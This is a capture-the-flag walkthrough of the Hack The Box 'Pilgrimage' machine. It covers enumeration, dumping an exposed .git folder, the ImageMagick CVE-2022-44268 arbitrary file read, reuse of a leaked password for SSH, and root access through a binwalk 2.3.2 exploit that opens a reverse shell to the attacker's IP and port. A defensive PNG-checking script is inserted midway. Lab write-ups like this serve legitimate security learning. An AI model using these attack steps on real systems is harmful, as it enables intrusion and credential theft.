With the nmap command nmap -p- -sV -sC 10.10.11.219
we got this result:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
| 256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
|_ 256 d14e293c708669b4d72cc80b486e9804 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So we know there is an SSH server and an HTTP server running nginx 1.18.0.
Going to the website we land on this page:
We have the option to log in, register, or upload an image, after which the site shows the shrunk version of that image. If we create an account and log in we get a "Dashboard" tab that lets us see all the images we have previously uploaded to the site.
Here I was stuck for a while trying a bunch of things, which is when I went back to enumeration. Always return to enumeration if you get stuck; don't tunnel vision, because you may be missing something. In my case I was missing an open .git repo on port 80. Since we did not have the redirect hostname in our /etc/hosts, nmap gave us this output: http-title: Did not follow redirect to http://pilgrimage.htb/
However, if we run nmap -p 80 -sV -sC 10.10.11.219
again, this time only against port 80 and with the redirect hostname in our /etc/hosts, we get this output:
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.18.0
| http-git:
| 10.10.11.219:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
|_http-title: Pilgrimage - Shrink Your Photos
Now we know for sure there is a /.git/ folder on the server. We can use a tool like git-dumper to pull the whole repository from that folder onto our own machine and look at the source code.
At first I thought there was a problem with the code, but everything appears sanitized. One thing we can note for later, though, is that the database is stored in /var/db/pilgrimage,
as we see in the code $db = new PDO('sqlite:/var/db/pilgrimage');
.
But what is this /var/www/pilgrimage.htb/magick
? Taking a closer look at it by going into the dumped git folder and running ./magick -version
we get this output:
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
Googling ImageMagick 7.1.0-49
I came across a vulnerability in ImageMagick 7.1.0. This vulnerability is triggered by the -resize operation inside Magick, exactly what we are looking for. If we embed a crafted payload in an image, hand it to Magick and then download the result, the output ends up inside the resized image. Let's try it first by making it print out /etc/passwd
from the server with this script: CVE-2022-44268.
After running cargo run "/etc/passwd"
against the file we got an image with the payload injected into it. When we upload it to the server and download the "shrunken" version, we can run identify -verbose {image}
to get the hex values of our input. Putting them into something like CyberChef and converting from hex to ASCII we get this output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
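From the defender's side, the file read above works because the vulnerable ImageMagick 7.1.0-49 honours a PNG text chunk whose keyword is "profile" and copies the named file into the output image. As an added example (not code from this write-up or from the Pilgrimage box), here is a small Python check that parses a PNG's chunks, verifies their CRCs, and flags any tEXt/zTXt/iTXt chunk keyed "profile"; the two sample PNGs and the placeholder path are constructed inline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = (b"tEXt", b"zTXt", b"iTXt")


def png_chunks(data: bytes):
    """Yield (chunk_type, body) for each chunk; length and CRC are verified."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_raw = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_raw) != 4:
            raise ValueError("truncated chunk %r" % ctype)
        if zlib.crc32(ctype + body) != struct.unpack(">I", crc_raw)[0]:
            raise ValueError("bad CRC in chunk %r" % ctype)
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":
            return


def profile_chunks(data: bytes):
    """Return (chunk_type, keyword, value_prefix) for text chunks keyed 'profile'."""
    hits = []
    for ctype, body in png_chunks(data):
        if ctype not in TEXT_CHUNKS:
            continue
        keyword, _, rest = body.partition(b"\x00")  # keyword ends at the first NUL
        if keyword.strip().lower() == b"profile":
            hits.append((ctype.decode(), keyword.decode(errors="replace"),
                         rest[:64].decode(errors="replace")))
    return hits


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Build one chunk: length, type, body, CRC over type+body."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


# Constructed 1x1 grayscale PNGs: one with a harmless Comment chunk, one with a
# "profile" chunk pointing at a placeholder path (no real target). The second is
# what an upload filter should reject before the image ever reaches magick.
_ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
_idat = zlib.compress(b"\x00\x00")
CLEAN_PNG = (PNG_SIG + _chunk(b"IHDR", _ihdr) + _chunk(b"tEXt", b"Comment\x00cat")
             + _chunk(b"IDAT", _idat) + _chunk(b"IEND", b""))
BAD_PNG = (PNG_SIG + _chunk(b"IHDR", _ihdr) + _chunk(b"tEXt", b"profile\x00/placeholder/path")
           + _chunk(b"IDAT", _idat) + _chunk(b"IEND", b""))
```

Running profile_chunks over the shrunk/ directory also makes a quick triage pass after the fact, since the uploaded originals keep their text chunks.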
Just for the fun of it I also tried to get the contents of /etc/shadow,
but that gave us no result because Magick is not allowed to read /etc/shadow
. What we can try instead is to get the contents of the /var/db/pilgrimage
database we noted earlier. Doing the same thing as before we get a bunch of hex values. Plugging them into CyberChef lets us see the contents.
Among a bunch of null values we find the SQL code:
And much lower down we see this:
Our own account is the creatively named asdfasd
with the password asdf
.
More importantly we see the user emily
from before with the password abigchonkyboi123
. Stylish.
Knowing that people reuse the same password everywhere, we can try to SSH into the machine with the username emily and password abigchonkyboi123
.
Bingo.
Now we cat out the contents of user.txt.
Looking around the home directory we find some interesting files, most notably pspy32 and binwalk_exploit.png. Looking at the pspy32 output we see that root is running something called /sbin/malwarescan.sh
. Looking closer at it we see the following code:
#!/bin/bash
# Signatures that get a freshly created file deleted.
blacklist=("Executable script" "Microsoft executable")
# Watch the shrunk/ directory; each CREATE event arrives as one line on stdin.
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
    # Strip everything up to "CREATE " to recover the new file's name.
    filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
    # Runs binwalk with extraction (-e) on the new file, as root.
    binout="$(/usr/local/bin/binwalk -e "$filename")"
    for banned in "${blacklist[@]}"; do
        if [[ "$binout" == *"$banned"* ]]; then
            /usr/bin/rm "$filename"
            break
        fi
    done
done
Here we see code being run every time something is created in the /var/www/pilgrimage.htb/shrunk/
directory, with the help of the inotifywait
command. We also see /usr/local/bin/binwalk -e
being run on every new file whenever a change happens in that directory. Let's take a look at the binwalk version on this machine.
emily@pilgrimage:~$ binwalk -h
Binwalk v2.3.2 Craig Heffner, ReFirmLabs https://github.com/ReFirmLabs/binwalk
If we look up
binwalk v2.3.2
we find a remote code execution vulnerability in binwalk version 2.3.2. Luckily the script from Exploit Database is already downloaded on the machine in the /tmp/
folder.
So all we have to do is run python3 /tmp/51249.py catt.png {YOUR_IP} {YOUR_PORT}
and then start a netcat listener on that port. You will then get an image called binwalk_exploit.png
in your folder, and all you have to do now is copy it over with cp binwalk_exploit.png /var/www/pilgrimage.htb/shrunk/
and boom.
This is definitely the hardest easy box I have done on Hack The Box. I was stuck on the first step for a long while, until I randomly decided to run the nmap scan again and saw the /.git/ directory. Everything went pretty smoothly from there, though. This is probably the best box I have done on HTB so far. I loved getting the user flag immensely. The root flag was a bit tricky, but learning to read the pspy32 output helped a ton.